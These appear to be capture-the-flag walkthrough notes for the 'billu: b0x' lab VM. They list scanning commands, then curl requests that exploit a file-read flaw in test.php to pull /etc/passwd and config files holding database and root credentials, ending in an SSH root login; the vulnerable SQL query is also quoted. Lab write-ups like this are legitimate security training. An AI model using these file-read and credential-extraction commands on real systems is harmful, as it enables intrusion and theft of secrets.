billu: b0x
netdiscover -r x.x.x.0/24
nmap <IP of billu>
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
nmap -p 1-65535 -T4 -A -v <IP of billu>
nmap -p- -A <IP of billu>
nmap -T4 -A -v -p- <IP of billu>
nmap -sSV -n -Pn <IP of billu> -T5
nikto -h http://<IP of billu>
dirb http://<IP of billu>
Dirb finds a couple of interesting directories: /add, /show and /test.
We also want to run a Dirb scan with big.txt as the wordlist:
dirb http://<IP of billu> /usr/share/wordlists/dirb/big.txt
or
dirb http://<IP of billu> /usr/share/dirb/wordlists/big.txt
or
dirb http://<IP of billu> /opt/wordlists/SecLists/Discovery/Web_Content/big.txt
or just run
locate big.txt
to find where the wordlist lives on your system.
From these Dirb results we see there is a phpMyAdmin install in the /phpmy/ directory: http://<IP of billu>/phpmy/phpmyadmin
So, navigating to http://<IP of billu>/phpmy/ sends us to the phpMyAdmin login page.
But root:<blank> doesn't work.
Navigating to http://<IP of billu>/test gives us the error:
'file' parameter is empty. Please provide file path in 'file' parameter
So, from this output we can determine that /test.php reads a parameter called 'file' and returns the contents of whatever server path is passed in it (an arbitrary file read), so let's pass it using curl:
curl -X POST -F 'file=/etc/issue' http://<IP of billu>/test.php
Ubuntu 12.04.5 LTS \n \l
Now, let's try to extract phpMyAdmin's config file. We can use BurpSuite or curl to change the HTTP method from GET to POST.
(Note: for the BurpSuite method go here: https://scriptkidd1e.wordpress.com/billu-b0x-vulnhubs-vm-walkthrough/)
(Note: we no longer really care about the phpMyAdmin backend credentials if we can exploit the SQLi.)
curl -X POST -F 'file=/var/www/phpmy/config.inc.php' http://<IP of billu>/test.php
Here we get the creds root:roottoor.
We can try these creds with SSH:
ssh root@<IP of billu>
or
ssh <IP of billu>
But we get a WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! error. (This means the key stored in known_hosts for that IP no longer matches the key the server presents; in a lab that is normally just a reused IP, but on a live network the same warning can indicate interception, so only remove the entry once you know why it changed.)
So:
ssh-keygen -f "/root/.ssh/known_hosts" -R <IP of billu>
whoami
root
:))))))))~~~~~~~~~~~~~
Note: These creds do not work on the phpMyAdmin login, duh...
___________________________________________________________
To go the phpMyAdmin route:
We can also extract the user list, the /etc/passwd file:
curl -X POST --data "file=/etc/passwd" http://<IP of billu>/test.php
Let's also extract index.php:
curl -X POST --data "file=index.php" http://<IP of billu>/test.php
At the top of this output we see the inclusion of two files, c.php and head.php. We also see that login authentication uses an auth table in the database, with the submitted username and password concatenated straight into the query string:
$run='select * from auth where pass=\''.$pass.'\' and uname=\''.$uname.'\'';
Now, let's open the c.php file:
curl -X POST --data "file=c.php" http://<IP of billu>/test.php
This reveals the credentials of the phpMyAdmin page:
$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");
So the creds to phpMyAdmin are billu:b0x_billu
To finish rooting this the phpMyAdmin way, go here:
https://scriptkidd1e.wordpress.com/billu-b0x-vulnhubs-vm-walkthrough/